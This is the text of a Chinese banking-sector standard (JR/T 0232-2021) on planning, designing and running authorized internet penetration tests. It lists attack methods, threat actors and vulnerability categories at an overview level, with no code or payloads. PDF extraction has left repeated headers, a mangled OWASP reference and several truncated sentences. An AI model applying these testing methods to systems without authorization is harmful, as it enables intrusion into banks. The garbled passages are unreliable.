2021銀行互聯(lián)網(wǎng)滲透測試指南

銀行互聯(lián)網(wǎng)滲透測試指南JR/T0232—2021JR/T0232—2021JR/T0232—2021JR/T0232—2021JR/T0232—2021目??次前言 III引言 IV范圍 1規(guī)范性引用文件 1術(shù)語和定義 1概述 3滲透測試策劃 3概述 3確定測試范圍 3確定測試引用文檔 3確定測試項(xiàng) 4確定被測試特性和不被測試特性 4確定測試方法與測試通過準(zhǔn)則 4確定暫停準(zhǔn)則和恢復(fù)條件 4測試交付項(xiàng) 4確定測試活動(dòng)、任務(wù)與進(jìn)度 4明確環(huán)境需求 5分配職責(zé)、權(quán)限和各部門間的工作銜接 5明確人員配備和培訓(xùn)目標(biāo) 5明確風(fēng)險(xiǎn)和應(yīng)急措施 5確定質(zhì)量保證過程 5測試策劃階段文檔 5滲透測試設(shè)計(jì) 6概述 6確定測試范圍 6被測試特征、測試方法與通過準(zhǔn)則 6測試用例 6測試環(huán)境 7測試過程描述 9測試就緒評(píng)審 9測試設(shè)計(jì)階段文檔 10滲透測試執(zhí)行 107.1概述 10信息收集 10威脅建模 11I1111IIII漏洞發(fā)現(xiàn) 12滲透攻擊 14測試執(zhí)行階段文檔 15滲透測試總結(jié) 158.1概述 15測試數(shù)據(jù)分析 15差異分析 15風(fēng)險(xiǎn)決策根據(jù)分析 15報(bào)告編寫 16測試評(píng)審 17測試總結(jié)階段文檔 17附錄A（資料性）銀行互聯(lián)網(wǎng)滲透測試過程要點(diǎn)清單 18附錄B（資料性）銀行互聯(lián)網(wǎng)滲透測試漏洞風(fēng)險(xiǎn)定級(jí)參考 21參考文獻(xiàn) 26JR/T0232—2021JR/T0232—2021JR/T0232—2021JR/T0232—2021銀行互聯(lián)網(wǎng)滲透測試指南范圍本文件提供了在銀行信息系統(tǒng)中開展互聯(lián)網(wǎng)滲透測試的整體流程以及流程各個(gè)環(huán)節(jié)中保障測試質(zhì)量、控制測試風(fēng)險(xiǎn)的指南。本文件適用于銀行互聯(lián)網(wǎng)滲透測試的策劃、設(shè)計(jì)、執(zhí)行、總結(jié)，也供保險(xiǎn)、證券等其他金融行業(yè)參考。規(guī)范性引用文件下列文件中的內(nèi)容通過文中的規(guī)范性引用而構(gòu)成本文件必不可少的條款。其中，注日期的引用（包括所有的修改單）適用于本文件。GB/T15532—2008計(jì)算機(jī)軟件測試規(guī)范GB/T25069—2010信息安全技術(shù)術(shù)語GB/T29246—2017信息技術(shù)安全技術(shù)信息安全管理體系概述和詞匯JR/T0101—2013銀行業(yè)軟件測試文檔規(guī)范術(shù)語和定義GB/T25069—2010和GB/T29246—2017界定的以及下列術(shù)語和定義適用于本文件。3.1滲透測試penetrationtest滲透性測試穿透性測試以模擬真實(shí)攻擊的動(dòng)作，檢測發(fā)現(xiàn)信息系統(tǒng)存在的技術(shù)漏洞，并利用漏洞突破信息系統(tǒng)的安全控制機(jī)制，進(jìn)而評(píng)估信息系統(tǒng)面臨的實(shí)際安全風(fēng)險(xiǎn)的一種測試手段。[來源：GB/T25069—2010,2.3.87,有修改]3.2授權(quán)authorization通過技術(shù)手段界定滲透測試實(shí)施范圍的過程。示例：通過防火墻策略僅允許滲透測試實(shí)施人員訪問測試范圍內(nèi)的信息系統(tǒng)。[來源：GB/T25069—2010,2.1.33,有修改]3.3威脅代理threatagent有動(dòng)機(jī)和能力破壞信息系統(tǒng)安全性的人或程序。示例：企圖通過攻擊信息系統(tǒng)非法獲取資金的黑客團(tuán)伙。3.4PAGEPAGE3PAGEPAGE26威脅建模threatmodeling對信息系統(tǒng)的資產(chǎn)、流程、攻擊信息系統(tǒng)的主要?jiǎng)訖C(jī)、潛在威脅代理及其能力等進(jìn)行分析，對相關(guān)的主體和關(guān)系進(jìn)行有效組織。注：威脅建模的目的是構(gòu)建信息系統(tǒng)面臨的最可能攻擊場景。3.5敏感信息sensitiveinformation由權(quán)威機(jī)構(gòu)確定的必須受保護(hù)的信息，該信息的泄露、修改、破壞或丟失會(huì)對人或事產(chǎn)生可預(yù)知的損害。注：敏感信息的具體分級(jí)標(biāo)準(zhǔn)宜參考JR/T0197—2020。[來源：GB/T25069—2010,]3.6漏洞vulnerability脆弱性弱點(diǎn)信息系統(tǒng)中可能被攻擊者利用的薄弱環(huán)節(jié)。[來源：GB/T25069—20102.3.30,有修改]3.7實(shí)施風(fēng)險(xiǎn)implementrisk滲透測試實(shí)施過程中可能對目標(biāo)信息系統(tǒng)的保密性、完整性、可用性帶來的影響。3.8訪問控制accesscontrol一種保證數(shù)據(jù)處理系統(tǒng)的資源只能由被授權(quán)主體按授權(quán)方式進(jìn)行訪問的手段。[來源：GB/T25069—202]3.9仿真環(huán)境simulationenvironment為避免直接在目標(biāo)信息系統(tǒng)中實(shí)施測試所引入的實(shí)施風(fēng)險(xiǎn)，仿照目標(biāo)信息系統(tǒng)搭建且具備測試所需的各項(xiàng)條件的滲透測試實(shí)施環(huán)境。示例：業(yè)務(wù)系統(tǒng)及配置與生產(chǎn)一致的測試環(huán)境；生產(chǎn)環(huán)境中與生產(chǎn)服務(wù)器配置一致但不承載實(shí)際業(yè)務(wù)的模擬服務(wù)器；與生產(chǎn)高度一致的網(wǎng)絡(luò)靶場環(huán)境。3.10權(quán)限提升privilegeescalation在低權(quán)限用戶狀態(tài)下，利用信息系統(tǒng)中存在的漏洞突破權(quán)限控制，獲得該用戶原本不具備的操作權(quán)限的過程。示例：利用操作系統(tǒng)漏洞從普通用戶權(quán)限提升為超級(jí)管理員用戶權(quán)限。3.11現(xiàn)場清理siteclearing滲透測試實(shí)施完畢后，將目標(biāo)信息系統(tǒng)恢復(fù)到測試前狀態(tài)的過程。示例：刪除上傳到目標(biāo)信息系統(tǒng)中的測試腳本。3.12應(yīng)急預(yù)案contingencyplan一種關(guān)于備份、應(yīng)急響應(yīng)和災(zāi)后恢復(fù)的計(jì)劃。[來源：GB/T25069—2010,]3.13保密性confidentiality信息對未授權(quán)的個(gè)人、實(shí)體或過程不可用或不泄露的特性。[來源：GB/T29246—2017,2.12]3.14完整性integrity準(zhǔn)確和完備的特性。[來源：GB/T29246—2017,2.40]3.15可用性availability根據(jù)授權(quán)實(shí)體的要求可訪問和可使用的特性。[來源：GB/T29246—2017,2.9]3.16遵從性compliance遵守指導(dǎo)活動(dòng)的相關(guān)條款的程度。概述銀行互聯(lián)網(wǎng)滲透測試是指從互聯(lián)網(wǎng)渠道發(fā)起的針對銀行信息系統(tǒng)的滲透測試，宜按照GB/T15532—2008中4.3規(guī)定的要求，將測試流程劃分為策劃、設(shè)計(jì)、執(zhí)行、總結(jié)四個(gè)階段，并根據(jù)整體JR/T0101—2013中4.4.3規(guī)定的要求，給出的單項(xiàng)測試三級(jí)規(guī)范編制。滲透測試策劃概述滲透測試策劃（以下簡稱測試策劃）主要進(jìn)行滲透測試需求分析，包括確定測試范圍，確定測試引用文檔，確定測試項(xiàng)以及被測試特性和不被測試特性，確定測試方法與測試通過準(zhǔn)則，確定暫停準(zhǔn)則和恢復(fù)條件，規(guī)定測試活動(dòng)、任務(wù)與進(jìn)度，明確環(huán)境需求，分配職責(zé)、權(quán)限和各部門間的工作銜接，明確人員配備和培訓(xùn)目標(biāo)，明確風(fēng)險(xiǎn)和應(yīng)急措施，確定質(zhì)量保證過程。在測試過程中，如發(fā)現(xiàn)在測試規(guī)劃階段確定的內(nèi)容有變化，宜及時(shí)變更測試策劃，并妥善管理測試策劃的版本。應(yīng)用程序編程接口（API，ApplicationProgrammingInterface）方式接入前，需要進(jìn)行接入方系統(tǒng)改造和接口開發(fā)，并與接口平臺(tái)開展聯(lián)調(diào)測試，其中功能測試和業(yè)務(wù)場景測試是必做項(xiàng)。確定測試范圍概述本滲透測試涉及到的范圍及其特征。示例：本滲透測試在因特網(wǎng)中國境內(nèi)網(wǎng)段，針對實(shí)際生產(chǎn)環(huán)境進(jìn)行。確定測試引用文檔確定開展?jié)B透測試所考慮的需求因素，每個(gè)文檔宜明確具體的標(biāo)識(shí)（包括版本）和條款，典型的引用文檔包括：國家監(jiān)管制度。金融行業(yè)監(jiān)管制度。組織自身安全管理策略規(guī)范。團(tuán)體組織準(zhǔn)入規(guī)范。示例：支付卡行業(yè)安全標(biāo)準(zhǔn)委員會(huì)（PCISSC，PaymentCardIndustrySecurityStandardsCouncil）、環(huán)球銀行金融電信協(xié)會(huì)（SWIFT，SocietyWorldwideInterbankFinancialTelecommunication）等團(tuán)體組織均有定期對特定信息系統(tǒng)進(jìn)行滲透測試的相關(guān)規(guī)范。業(yè)務(wù)需求以及非功能需求。示例：某些重要業(yè)務(wù)系統(tǒng)需要很高的安全性，上線前和（或）上線后可能會(huì)提出專項(xiàng)的滲透測試需求。確定測試項(xiàng)根據(jù)界定的測試范圍，確定具體的滲透測試對象。測試項(xiàng)宜能夠進(jìn)行明確的標(biāo)識(shí)和界定。示例：測試項(xiàng)通過具有唯一性的屬性予以標(biāo)識(shí)的例子包括互聯(lián)網(wǎng)協(xié)議（IP，InternetProtocol）地址、域名、域名+統(tǒng)一資源定位符（URL，UniformResourceLocators）、客戶端程序版本、客戶端程序文件哈希值。當(dāng)測試范圍為因特網(wǎng)中國境內(nèi)網(wǎng)段實(shí)際生產(chǎn)環(huán)境時(shí)，測試項(xiàng)為銀行的整個(gè)信息與通信（ICT，InformationandCommunicationsTechnology）系統(tǒng)。確定被測試特性和不被測試特性確定具體的滲透測試特性，即滲透測試針對測試項(xiàng)的哪些方面和不針對哪些方面。示例：當(dāng)測試范圍為因特網(wǎng)中國境內(nèi)網(wǎng)段，測試項(xiàng)為銀行的整個(gè)ICT系統(tǒng)時(shí)，被測試特性為針對通用信息技術(shù)產(chǎn)品的通過互聯(lián)網(wǎng)的攻擊和利用應(yīng)用系統(tǒng)業(yè)務(wù)需求邏輯漏洞進(jìn)行的攻擊。不被測試特性包括高級(jí)可持續(xù)威脅（APT，AdvancedPersistentThreat）攻擊和分布式拒絕服務(wù)（DDOS，DistributedDenyOfService）攻擊。確定測試方法與測試通過準(zhǔn)則根據(jù)滲透測試的目的、內(nèi)容以及實(shí)施特性，選定滲透測試方法，明確成功實(shí)施該測試的準(zhǔn)則。示例：滲透測試全流程中典型的測試方法包括：搜索，如基于搜索引擎收集信息。掃描，如通過自動(dòng)化掃描工具收集信息或檢測漏洞。監(jiān)聽，如通過網(wǎng)絡(luò)監(jiān)聽竊取未加密敏感信息。篡改，如篡改上傳服務(wù)端的交易數(shù)據(jù)。繞過，如繞過登錄控制直接訪問敏感信息。濫用，如惡意、頻繁地使用正常的業(yè)務(wù)功能。破解，如破解相關(guān)密碼算法還原加密的敏感信息。逆向，如通過動(dòng)態(tài)調(diào)試、反編譯等方式掌握程序的運(yùn)行邏輯。注入，如輸入包含惡意代碼的數(shù)據(jù)。確定暫停準(zhǔn)則和恢復(fù)條件包括計(jì)劃內(nèi)暫停和計(jì)劃外暫停兩種情況。在暫停后恢復(fù)時(shí)，宜關(guān)注是否需要進(jìn)行回歸測試。測試交付項(xiàng)，宜確定為可交付項(xiàng)。確定測試活動(dòng)、任務(wù)與進(jìn)度明確準(zhǔn)備和執(zhí)行滲透測試的主要活動(dòng)、任務(wù)和所需的時(shí)間周期，粒度宜符合實(shí)際需要，對不同的活動(dòng)、任務(wù)可按照不同的粒度進(jìn)行規(guī)劃。明確各項(xiàng)任務(wù)間的所有依賴關(guān)系和所需要的任何特殊技能。示例：在典型情況下，具體的實(shí)施計(jì)劃宜包括測試的起始時(shí)間點(diǎn)、測試的結(jié)束時(shí)間點(diǎn)或結(jié)束標(biāo)志，以及測試周期內(nèi)的具體實(shí)施時(shí)間段。明確環(huán)境需求典型的測試環(huán)境需求包括但不限于：所需的硬件。所需的軟件，包括基礎(chǔ)軟件和測試工具軟件。所需的特殊硬件設(shè)備。所需的網(wǎng)絡(luò)環(huán)境，包括網(wǎng)絡(luò)種類、帶寬、賬號(hào)。測試所需的基礎(chǔ)數(shù)據(jù)。測試設(shè)計(jì)和執(zhí)行的物理場地與辦公設(shè)施。測試所需的銀行產(chǎn)品憑據(jù)。分配職責(zé)、權(quán)限和各部門間的工作銜接確定負(fù)責(zé)管理、設(shè)計(jì)、準(zhǔn)備、執(zhí)行、監(jiān)督和解決問題的各個(gè)小組，實(shí)現(xiàn)所有的工作任務(wù)均有任務(wù)屬主，且明確承擔(dān)相關(guān)屬主角色之間的不兼容職責(zé)。所有參與者從承擔(dān)責(zé)任上分為任務(wù)屬主或參與者。從時(shí)間投入上分為全職人員或共享人員。宜確定這些個(gè)人和小組之間交流的內(nèi)容和方法，包括闡明信息流和數(shù)據(jù)流的圖表。按最小權(quán)限原則對滲透測試全體人員進(jìn)行合理授權(quán)。對涉及到內(nèi)部網(wǎng)絡(luò)的，宜僅開通測試所需的網(wǎng)絡(luò)訪問范圍和相關(guān)支撐系統(tǒng)、應(yīng)用系統(tǒng)所必要的用戶權(quán)限。對所有滲透測試涉及的文檔（包括本計(jì)劃）、工具、數(shù)據(jù)的歸屬、共享做出規(guī)定。明確人員配備和培訓(xùn)目標(biāo)根據(jù)任務(wù)和設(shè)置的小組與職責(zé)提出對人員的配備和技能的需求，對不具備相關(guān)技能的情況，說明如何進(jìn)行培訓(xùn)。示例：指導(dǎo)組、工具組、環(huán)境組人員來自專業(yè)團(tuán)隊(duì)且已經(jīng)具備了所需的知識(shí)與技能。設(shè)計(jì)組需外部專家指導(dǎo)且明確風(fēng)險(xiǎn)和應(yīng)急措施標(biāo)識(shí)測試策劃的風(fēng)險(xiǎn)假設(shè)，提出應(yīng)對各種風(fēng)險(xiǎn)的應(yīng)急措施。示例：本滲透測試可預(yù)料到的風(fēng)險(xiǎn)和應(yīng)急措施包括：對生產(chǎn)環(huán)境可能導(dǎo)致的破壞風(fēng)險(xiǎn)，應(yīng)急措施為提前編制應(yīng)急預(yù)案，提前備份敏感數(shù)據(jù)及重要系統(tǒng)。該功能涉及到應(yīng)用系統(tǒng)的修復(fù)。產(chǎn)業(yè)務(wù)高峰期，限制自動(dòng)化工具的并發(fā)數(shù)。測試過程中誤操作可能導(dǎo)致的風(fēng)險(xiǎn)，應(yīng)急措施為測試均應(yīng)采用腳本化方式，操作時(shí)雙人實(shí)施。數(shù)據(jù)，以便后期通過回歸測試復(fù)現(xiàn)測試過程。確定質(zhì)量保證過程明確為保證測試過程和產(chǎn)品質(zhì)量所用的方法，包含或引用異常的跟蹤和解決過程。示例：所有的滲透測試均經(jīng)過設(shè)計(jì)，編制了測試規(guī)格說明并經(jīng)過評(píng)審。所有的測試過程均編制了測試日志，經(jīng)質(zhì)量控制人員審核，記錄內(nèi)容與測試過程一致。編制了測試總結(jié)報(bào)告并通過評(píng)審。測試策劃階段文檔在測試策劃階段，宜按照J(rèn)R/T0101—2013中第5章規(guī)定的要求，制定測試策劃。在本測試復(fù)用JR/T0101—2013中第10JR/T0101—2013中第15JR/T0101—2013中第9章規(guī)定的要求編制；測試日志宜按照J(rèn)R/T0101—2013中第11章規(guī)定的要求編制，測試總結(jié)報(bào)告宜按照J(rèn)R/T0101—2013中第14章規(guī)定的要求編制。滲透測試設(shè)計(jì)概述滲透測試設(shè)計(jì)（以下簡稱測試設(shè)計(jì)）是按照測試策劃，進(jìn)一步細(xì)化針對被測試特征的測試方法和通過準(zhǔn)則，選用已有的測試用例或設(shè)計(jì)新的測試用例；獲取并驗(yàn)證測試數(shù)據(jù)；確定測試用例執(zhí)行順序的測試規(guī)程；準(zhǔn)備測試工具并在必要時(shí)開發(fā)測試軟件；建立并驗(yàn)證測試環(huán)境；進(jìn)行測試就緒評(píng)審。在測試設(shè)計(jì)過程中，發(fā)現(xiàn)測試策劃需要變更的，宜在經(jīng)過評(píng)審后及時(shí)變更測試策劃，使測試策劃與測試規(guī)格保持一致與協(xié)調(diào)。確定測試范圍說明本滲透測試涉及到的范圍及其特征。若測試策劃的范圍描述已經(jīng)能夠滿足對不同測試方法的設(shè)計(jì)，則可直接參考該測試策劃。在必要時(shí)，可針對測試策劃中描述的測試范圍有選擇地進(jìn)行細(xì)化，以說明應(yīng)用相關(guān)測試方法的必要性。被測試特征、測試方法與通過準(zhǔn)則在測試策劃描述的測試項(xiàng)、測試方法與測試通過準(zhǔn)則的基礎(chǔ)上，針對每一測試特征，在必要時(shí)細(xì)化測試方法。描述的粒度宜能按照給定的方法進(jìn)行測試用例和測試規(guī)程的設(shè)計(jì)。示例：測試項(xiàng)、測試方法與測試通過準(zhǔn)則見測試策劃。測試用例測試用例標(biāo)識(shí)規(guī)則明確測試用例描述的方式。不論采用哪種方式，均可唯一定位和檢索，并說明使用的規(guī)則與注意事項(xiàng)。測試用例概述對相關(guān)測試用例集合中每個(gè)輸入都有效的約束條件。任何共享環(huán)境的需求。對共享的特殊規(guī)程的規(guī)定。共享的測試用例之間的依賴關(guān)系。測試用例詳述概述每個(gè)或每組測試用例均宜遵循的規(guī)范，具體如下：對應(yīng)的測試要點(diǎn)。適用測試規(guī)程（場景）描述。測試用例的輸入和預(yù)期的結(jié)果。測試結(jié)果判定方法。案例實(shí)施所需數(shù)據(jù)，如用戶。A。測試用例宜滿足的特殊需求。宜對測試用例潛在的實(shí)施風(fēng)險(xiǎn)及應(yīng)急措施進(jìn)行說明。生產(chǎn)環(huán)境下的滲透測試所使用的用戶宜提前備案并全程監(jiān)控。測試用例編號(hào)為本測試用例賦予一個(gè)唯一標(biāo)識(shí)符，以便將其與其他測試用例區(qū)分開，宜通過自動(dòng)工具生成標(biāo)識(shí)符。輸入與輸出說明（或測試方法（或預(yù)期可能接收到的反饋。宜參1OWAPTop0OpenWebAppicaionSeuriyProjectTop10）（見7.4）和攻擊驗(yàn)證內(nèi)容（見7.5.1）的每一項(xiàng)的用例制定明確的輸入和輸出說明，規(guī)定所有合適的數(shù)據(jù)庫、文件、配置參數(shù)、接口報(bào)文、輸入終端、內(nèi)存駐留區(qū)域及操作系統(tǒng)傳送的各個(gè)值。對于新技術(shù)、新業(yè)務(wù)場景等原因無法明確測試輸入輸出的，可采用莽撞測試的方法，宜描述具體數(shù)據(jù)記錄的方法，但相關(guān)測試宜由具有三年以上滲透測試工作經(jīng)驗(yàn)的測試人員完成，并提前獲得測試需求方授權(quán)。規(guī)定輸入之間的所有必要的關(guān)系。示例：輸入存在時(shí)序，前導(dǎo)交易和后繼交易均為輸入之間的關(guān)系。采用的測試設(shè)計(jì)方法6.3注：本節(jié)的目的是使得所有測試用例都采用了已經(jīng)確定的測試設(shè)計(jì)方法。對其他用例依賴關(guān)系列出本測試用例與其他用例的依賴關(guān)系，宜區(qū)分以下情況：其他用例是執(zhí)行本測試用例的必要條件。本測試用例是執(zhí)行其他用例的必要條件。特殊需求說明描述執(zhí)行本測試用例時(shí)特殊的需求，包括但不限于管理需求、對人員的需求。對環(huán)境的需求宜在6.5中描述，本測試用例屬于特殊情況的，宜在本節(jié)提及。測試環(huán)境描述啟動(dòng)滲透測試、執(zhí)行滲透測試和記錄結(jié)果所需的測試環(huán)境，通常按每個(gè)（或每組）場景進(jìn)行描述，可使用一個(gè)（或多個(gè)）圖形來展示所有的環(huán)境組成成分及其間信息交互。滲透測試環(huán)境描述策略，具體如下：當(dāng)滲透測試環(huán)境為生產(chǎn)環(huán)境時(shí)，可僅描述測試現(xiàn)場所需的環(huán)境。當(dāng)在測試策劃中對環(huán)境的描述足夠清晰和細(xì)致的情況下，以及在單獨(dú)制定了測試環(huán)境需求規(guī)格說明和（或）測試數(shù)據(jù)需求規(guī)格說明時(shí)，本節(jié)可直接引用這些文檔。當(dāng)測試策劃、測試環(huán)境需求規(guī)格說明、測試數(shù)據(jù)需求規(guī)格說明發(fā)生變更時(shí)，本節(jié)宜對變更情況進(jìn)行詳細(xì)描述。僅為部分特殊的測試用例需求的測試環(huán)境，可不在本節(jié)描述。測試執(zhí)行環(huán)境滲透測試實(shí)施前宜完成各項(xiàng)環(huán)境準(zhǔn)備工作，具體如下：基礎(chǔ)環(huán)境準(zhǔn)備工作，當(dāng)在為滲透測試專門搭建的仿真環(huán)境進(jìn)行測試時(shí)，需說明與生產(chǎn)環(huán)境的差異并評(píng)價(jià)可比性，主要包括：測試所需的系統(tǒng)資源，包括硬件、基礎(chǔ)軟件和支撐軟件等。測試所需的網(wǎng)絡(luò)資源，包括硬件、地址、端口、賬號(hào)等。應(yīng)用系統(tǒng)。測試基礎(chǔ)數(shù)據(jù)。監(jiān)控審計(jì)環(huán)境準(zhǔn)備工作，確保測試過程得到有效的監(jiān)控和記錄，該環(huán)境宜滿足：所有網(wǎng)絡(luò)流量均得以記錄，并在所需的時(shí)間周期（例如半年）內(nèi)可用。所有終端操作均得以記錄，并在所需的時(shí)間周期（例如半年）內(nèi)可用。終端操作記錄方式可通過錄屏、命令行日志記錄等方式實(shí)現(xiàn)。已采取信息防泄漏措施。對基礎(chǔ)環(huán)境及監(jiān)控審計(jì)環(huán)境的有效性設(shè)立了檢查確認(rèn)準(zhǔn)則。測試工具準(zhǔn)備滲透測試實(shí)施前宜完成各項(xiàng)工具準(zhǔn)備工作，具體如下：準(zhǔn)備以下常用滲透測試工具：信息收集工具，如端口掃描工具、目錄枚舉工具、網(wǎng)絡(luò)監(jiān)聽工具等。漏洞掃描工具，如網(wǎng)站漏洞掃描工具、系統(tǒng)層漏洞掃描工具等。漏洞利用工具，如暴力破解工具、數(shù)據(jù)包攔截和篡改工具、典型高危漏洞的專用工具等。測試文檔管理工具。缺陷管理工具。非實(shí)施方自主開發(fā)測試工具宜具備可跟蹤的、合規(guī)的獲取路徑。實(shí)施方自主開發(fā)測試工具宜由實(shí)施方進(jìn)行工具安全性審查，重點(diǎn)審核不包含與銀行互聯(lián)網(wǎng)滲透測試實(shí)施無關(guān)的功能。對擬采用的工具進(jìn)行詳細(xì)記錄，包括但不限于：工具名稱。工具用途。工具提供方。工具獲取途徑。工具版本號(hào)。工具的散列值。測試驗(yàn)證授權(quán)對授權(quán)策略的執(zhí)行情況進(jìn)行驗(yàn)證，具體如下：測試實(shí)施人員宜具有達(dá)成測試目標(biāo)所需的必要權(quán)限，包括以下內(nèi)容：測試對象網(wǎng)絡(luò)可達(dá)。具有特定權(quán)限的測試用戶。根據(jù)測試目標(biāo)配置合理的安全策略，包括以下內(nèi)容：單純以發(fā)現(xiàn)應(yīng)用軟件漏洞為目標(biāo)的測試，宜通過白名單策略，放開對測試源的限制。以驗(yàn)證目標(biāo)系統(tǒng)整體安全防護(hù)狀況為目標(biāo)的測試，不宜單獨(dú)為測試源開通特殊安全策略。采取有效措施來控制測試實(shí)施人員行為超越授權(quán)范圍的風(fēng)險(xiǎn)，包括以下內(nèi)容：防火墻隔離。邊界監(jiān)控。日志審計(jì)。測試過程描述日志列出記錄日志的工具和方法，記錄的內(nèi)容包括測試執(zhí)行的結(jié)果，任何觀測到的異常，以及任何其他有關(guān)測試的事件。建立提供準(zhǔn)備執(zhí)行規(guī)程所需的動(dòng)作序列。典型地，信息收集、威脅建模、漏洞發(fā)現(xiàn)都是建立的重要?jiǎng)幼鳌?dòng)提供開始執(zhí)行規(guī)程所需的動(dòng)作。典型地，滲透攻擊是啟動(dòng)的重要?jiǎng)幼?。處理提供在?guī)程執(zhí)行過程中所需的動(dòng)作。若測試用例按照場景或系列場景設(shè)計(jì)，即由多組輸入、輸出的有序排列構(gòu)成，則不必在此重復(fù)描述測試用例的執(zhí)行序列。本文件描述的攻擊過程（見7.5.2）是典型的處理過程。度量描述如何進(jìn)行測試度量。度量可以是多維度的，例如對進(jìn)度的度量和對測試結(jié)果的度量。暫停因計(jì)劃外事件導(dǎo)致的臨時(shí)暫停，描述測試所需的動(dòng)作。對已經(jīng)在測試策劃中描述了暫停的，此處引用即可。再啟動(dòng)規(guī)定所有再啟動(dòng)點(diǎn)，描述在各再啟動(dòng)點(diǎn)上重新啟動(dòng)規(guī)程所必需的動(dòng)作。對已經(jīng)在測試策劃中描述了再啟動(dòng)的，此處引用即可。停止描述正常停止執(zhí)行時(shí)所必需的動(dòng)作。結(jié)束描述在運(yùn)行的規(guī)程全部執(zhí)行完成后（包括終止記錄日志），恢復(fù)環(huán)境所必需的動(dòng)作。典型地，包括回收用于測試的權(quán)限。應(yīng)急描述處理執(zhí)行過程中可能發(fā)生的異常事件所必需的動(dòng)作。測試就緒評(píng)審在測試執(zhí)行前，宜對測試策劃和測試設(shè)計(jì)進(jìn)行評(píng)審，評(píng)審測試策劃的合理性、測試環(huán)境和測試工具的有效性，以及測試用例的可操作性和覆蓋充分性等。評(píng)審的主要內(nèi)容有：評(píng)審測試策劃的合理性，包括測試目標(biāo)、測試項(xiàng)、測試內(nèi)容、測試方法、時(shí)間計(jì)劃及授權(quán)策略等的合理性。評(píng)審測試環(huán)境和測試工具的有效性。評(píng)審測試用例的可操作性和充分性。測試設(shè)計(jì)階段文檔在測試設(shè)計(jì)過程中，宜按照J(rèn)R/T0101—2013中第9章規(guī)定的要求，編制測試規(guī)格說明。對認(rèn)為本滲透測試文檔具有高度復(fù)用價(jià)值的，宜按照J(rèn)R/T0101—2013中第6、7、8章規(guī)定的要求，分別編制測試設(shè)計(jì)說明、測試用例說明和測試規(guī)程說明。在本測試復(fù)用概率較低且對后繼工作影響較小情JR/T0101—2013中第10JR/T0101—2013中第15如有必要，測試環(huán)境需求規(guī)格說明宜參照J(rèn)R/T0101—2013中附錄D.4規(guī)定的要求，測試數(shù)據(jù)需求規(guī)格說明宜參照J(rèn)R/T0101—2013中附錄D.5規(guī)定的要求。滲透測試執(zhí)行概述滲透測試執(zhí)行（以下簡稱測試執(zhí)行）是按照設(shè)計(jì)的過程執(zhí)行測試用例，獲得滲透測試結(jié)果，編制測試日志；分析并判定滲透測試是否達(dá)到預(yù)期以及是否進(jìn)行多輪測試；測試結(jié)束前，審核測試記錄文檔是否完整、有效、一致；在測試過程中，如出現(xiàn)異常情況，按照測試設(shè)計(jì)進(jìn)行處理并編制測試事件報(bào)告；完成全部預(yù)定的測試任務(wù)后，清理測試現(xiàn)場。在應(yīng)急測試時(shí)，編制測試綜合報(bào)告中涉及到測試執(zhí)行的相關(guān)內(nèi)容。信息收集滲透測試的信息收集宜根據(jù)具體的測試范圍、測試引用文檔和測試項(xiàng)，結(jié)合測試需求方提供的信息，在測試需求方認(rèn)同并知曉的情況下，通過滲透收集或刺探性收集?；A(chǔ)信息收集滲透測試宜嘗試進(jìn)行基礎(chǔ)信息收集，具體如下：網(wǎng)絡(luò)信息，包括但不限于：域名解析記錄。IP開放端口。系統(tǒng)信息，包括但不限于：設(shè)備類型。已安裝的軟件，如中間件、數(shù)據(jù)庫、虛擬化軟件等。操作系統(tǒng)和已安裝軟件的官方補(bǔ)丁列表。應(yīng)用信息，包括但不限于：開發(fā)語言。開源框架或插件。功能接口。URL業(yè)務(wù)功能。業(yè)務(wù)面向的用戶群體。應(yīng)用的官方補(bǔ)丁列表。安全防護(hù)信息，包括但不限于：已部署的安全防護(hù)產(chǎn)品功能。已部署的安全防護(hù)產(chǎn)品的廠商。其他信息收集滲透測試可嘗試開展信息收集工作，具體如下：通過互聯(lián)網(wǎng)等公開合法渠道進(jìn)一步收集與本滲透測試相關(guān)的信息如下：相關(guān)文檔資料。郵件列表。所處公共托管環(huán)境。已公開歷史安全漏洞。通過公開渠道所收集的信息如為委托方已泄露的內(nèi)部敏感信息，及時(shí)告知委托方。提升測試效率及質(zhì)量，經(jīng)委托方同意，實(shí)施方可申請直接從委托方獲取部分測試對象相關(guān)信息如下：已使用的各類軟、硬件及其版本。部分源代碼。網(wǎng)絡(luò)拓?fù)?。威脅建模威脅建模是指在分析業(yè)務(wù)功能特征基礎(chǔ)上分析攻擊者動(dòng)機(jī)、判斷最主要威脅場景的過程。不是所有滲透測試或黑客攻擊都有該流程，在銀行互聯(lián)網(wǎng)滲透測試實(shí)施階段引入該環(huán)節(jié)的目的是通過分析銀行系統(tǒng)的不同業(yè)務(wù)特性，能更好地判斷攻擊動(dòng)機(jī)，從而開展更加有針對性的測試。攻擊動(dòng)機(jī)分析在分析滲透測試對象承載的業(yè)務(wù)及其流程的基礎(chǔ)上，分析評(píng)估潛在攻擊者的攻擊動(dòng)機(jī)，具體如下：竊取資金。竊取敏感信息。作為入侵更重要系統(tǒng)的跳板。造成不良社會(huì)影響。威脅主體分析根據(jù)攻擊動(dòng)機(jī)分析結(jié)果，分析評(píng)估潛在的威脅主體及其能力，具體如下：分析潛在外部威脅主體：逐利的黑產(chǎn)團(tuán)伙。追求知名度的非授權(quán)安全技術(shù)人員。敵對政治勢力。無政府主義組織。分析潛在內(nèi)部威脅主體：心懷惡意的員工。外包技術(shù)支持人員。主要攻擊場景判斷在攻擊動(dòng)機(jī)分析和威脅主體分析基礎(chǔ)上，明確本次滲透所需要模擬的最主要攻擊場景，并據(jù)此調(diào)整滲透測試案例及工具方法。漏洞發(fā)現(xiàn)基礎(chǔ)漏洞發(fā)現(xiàn)滲透測試的基礎(chǔ)漏洞發(fā)現(xiàn)宜滿足如下一般性操作要點(diǎn)：在使用自動(dòng)化漏洞掃描工具檢測漏洞的同時(shí)，根據(jù)威脅建模結(jié)果，有重點(diǎn)地開展手工漏洞檢測工作。在生產(chǎn)環(huán)境中，不直接實(shí)施影響系統(tǒng)正常對外提供業(yè)務(wù)服務(wù)的漏洞檢測技術(shù)。根據(jù)目標(biāo)系統(tǒng)性能情況控制自動(dòng)化漏洞掃描工具的并發(fā)數(shù)。在生產(chǎn)環(huán)境中，不直接對原有數(shù)據(jù)進(jìn)行篡改。應(yīng)用層漏洞發(fā)現(xiàn)根據(jù)信息收集情況，嘗試檢測發(fā)現(xiàn)潛在的應(yīng)用層漏洞，具體如下：檢測應(yīng)用在身份鑒別方面的漏洞，包括但不限于：弱口令。圖片驗(yàn)證碼繞過。認(rèn)證繞過。會(huì)話未正常結(jié)束。